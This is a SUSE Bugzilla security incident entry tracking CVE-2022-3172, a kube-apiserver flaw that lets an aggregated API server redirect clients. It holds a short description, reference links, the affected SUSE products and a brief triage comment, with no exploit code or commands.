Bug 1203510 (CVE-2022-3172)

Summary: VUL-0: CVE-2022-3172: kubernetes: kube-apiserver: Aggregated API server can cause clients to be redirected (SSRF)
Product: [Novell Products] SUSE Security Incidents Reporter: Thomas Leroy <thomas.leroy>
Component: IncidentsAssignee: Containers Team <containers-bugowner>
Status: NEW --- QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: jkowalczyk, security-team
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/342833/
Whiteboard:
Found By: Security Response Team Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description Thomas Leroy 2022-09-19 08:16:51 UTC
rh#2127804

A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This could lead to the
client performing unexpected actions as well as forwarding the client's API server credentials to third parties.

ref: https://github.com/kubernetes/kubernetes/issues/112513

References:
https://bugzilla.redhat.com/show_bug.cgi?id=2127804
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-3172
https://seclists.org/oss-sec/2022/q3/207
Comment 1 Thomas Leroy 2022-09-19 08:20:45 UTC
Affected:
- SUSE:SLE-15-SP1:Update:Products:CASP40:Update
- openSUSE:Factory
Comment 2 Thomas Leroy 2022-09-19 09:38:54 UTC
(In reply to Thomas Leroy from comment #1)
> Affected:
> - SUSE:SLE-15-SP1:Update:Products:CASP40:Update

CVSS < 8.0 sorry, so I guess wontfix for casp

> - openSUSE:Factory